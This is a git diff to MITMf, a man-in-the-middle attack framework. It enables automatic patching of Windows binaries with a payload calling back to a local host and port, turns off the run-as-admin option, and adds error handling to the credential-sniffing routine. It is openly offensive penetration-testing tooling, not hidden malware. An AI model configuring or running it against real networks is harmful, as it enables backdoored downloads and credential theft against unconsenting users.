diff --git a/config/mitmf.conf b/config/mitmf.conf index ced60ed..0f97ca9 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -444,7 +444,7 @@ [[[[WindowsIntelx86]]]] PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND # PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke - PATCH_METHOD = + PATCH_METHOD = automatic HOST = 192.168.1.16 PORT = 8090 # SHELL for use with automatic PATCH_METHOD @@ -455,7 +455,7 @@ # PATCH_DLLs as they come across PATCH_DLL = False # RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable - RUNAS_ADMIN = True + RUNAS_ADMIN = False # XP_MODE - to support XP targets XP_MODE = True # SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and @@ -476,7 +476,7 @@ ZERO_CERT = True PATCH_DLL = True # RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable - RUNAS_ADMIN = True + RUNAS_ADMIN = False # SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and # with PATCH_METHOD 'replace' use an EXE not DLL SUPPLIED_BINARY = pentest_x64_payload.exe diff --git a/core/netcreds.py b/core/netcreds.py index be556b9..5daa6b8 100644 --- a/core/netcreds.py +++ b/core/netcreds.py @@ -46,7 +46,10 @@ class NetCreds: version = "1.0" def sniffer(self, interface, ip): - sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0) + try: + sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0) + except Exception as e: + if "Interrupted system call" in e: pass def start(self, interface, ip, pcap): if pcap: